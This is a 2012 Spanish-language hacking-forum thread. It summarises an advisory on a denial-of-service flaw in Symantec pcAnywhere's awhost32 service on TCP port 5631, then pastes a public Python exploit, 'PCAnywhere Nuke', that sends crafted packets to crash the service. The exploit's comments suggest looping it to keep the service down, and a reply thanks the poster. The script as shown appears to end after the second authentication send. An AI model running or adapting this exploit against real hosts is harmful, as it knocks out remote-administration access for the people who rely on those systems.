Inicio
Buscar
Ingresar
Registrarse
Starfield: el juego que revolucionará el espacio y la tecnología
Hack x Crack - Comunidad de Seguridad informática
»
Seguridad Informatica
»
Hacking
»
PC Anywhere --BUG
Imprimir
Páginas: [
1
]
Ir Abajo
Autor
Tema: PC Anywhere --BUG (Leído 1796 veces)
Leviatan
{ L4 } Geek
Mensajes: 322
PC Anywhere --BUG
«
en:
Febrero 27, 2012, 10:41:16 pm »
Denegación de servicio en Symantec pcAnywhere
----------------------------------------------
Se ha anunciado una vulnerabilidad en Symantec pcAnywhere, que puede ser
empleada por un atacante para provocar condiciones de denegación de
servicio.
PCAnywhere es una popular aplicación comercial de control remoto creada
por la empresa Symantec que permite a los usuarios administrar un
ordenador a distancia. Esto es especialmente útil para situaciones donde
el acceso físico no sea posible, para tareas de soporte en remoto, etc.,
por lo que suele estar accesible en redes abiertas. En el servidor, el
proceso escucha por defecto en el puerto TCP 5631.
La vulnerabilidad reside en un error en el servicio awhost32 al tratar
determinadas peticiones. Un atacante puede aprovechar este problema para
evitar nuevas conexiones mediante el envío de paquetes específicamente
manipulados al puerto TCP 5631.
Existe un exploit público para versiones 12.5.0 (build 463).
Hay que señalar que es la segunda ocasión en menos de un mes que se
encuentra una vulnerabilidad sobre el mismo componente de pcAnywhere.
Symantec ha publicado una nueva actualización del mismo hotfix, con la
identificación TECH180472 (que actualiza a la buid 483).
para que no busqueis.....
-----------------------------------------------------------------------------------------------------------
#!/usr/bin/python
'''
Exploit Title: PCAnywhere Nuke
Date: 2/16/12
Author: Johnathan Norman spoofy <at> exploitscience.org or @spoofyroot
Version: PCAnyWhere (12.5.0 build 463) and below
Tested on: Windows
Description: The following code will crash the awhost32 service. It'll be respawned
so if you want to be a real pain you'll need to loop this.. my inital impressions
are that controlling execuction will be a pain.
'''
import sys
import socket
import argparse
if len(sys.argv) != 2:
print "
Usage: ./pcNuke.py <HOST>"
sys.exit(1)
HOST = sys.argv[1]
PORT = 5631
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
# HELLO!
s.send("\x00\x00\x00\x00")
buf = s.recv(1024)
# ACK!
s.send("\x6f\x06\xfe")
buf = s.recv(1024)
# Auth capability part 1
s.send("\x6f\x62\xff\x09\x00\x07\x00\x00\x01\xff\x00\x00\x07\x00")
# Auth capability part 2
s.send("\x6f\x62\xff\x09\x00\x07\x00\x00\x01\xff\x00\x00\x07\x00")
«
Última modificación: Febrero 27, 2012, 11:28:51 pm por Leviatan
»
En línea
"Será una pelea entre un elefante y un tigre. Si el tigre se queda quieto el elefante lo aplastará sin remedio; pero el tigre nunca se quedará quieto. Saltará sobre el lomo del elefante arrancándole grandes trozos de carne para esconderse después en la jungla. Así el elefante morirá desangrado."
The_GanGsTar
{ L4 } Geek
Mensajes: 391
Me gustan los panqueques
Re:PC Anywhere --BUG
«
Respuesta #1 en:
Marzo 10, 2012, 05:08:36 am »
O: OMG gracias por la data!
En línea
Imprimir
Páginas: [
1
]
Ir Arriba
Hack x Crack - Comunidad de Seguridad informática
»
Seguridad Informatica
»
Hacking
»
PC Anywhere --BUG
Va un mudo y le dice a un sordo: Hack x Crack usa cookies. Pues eso...
OK
Learn more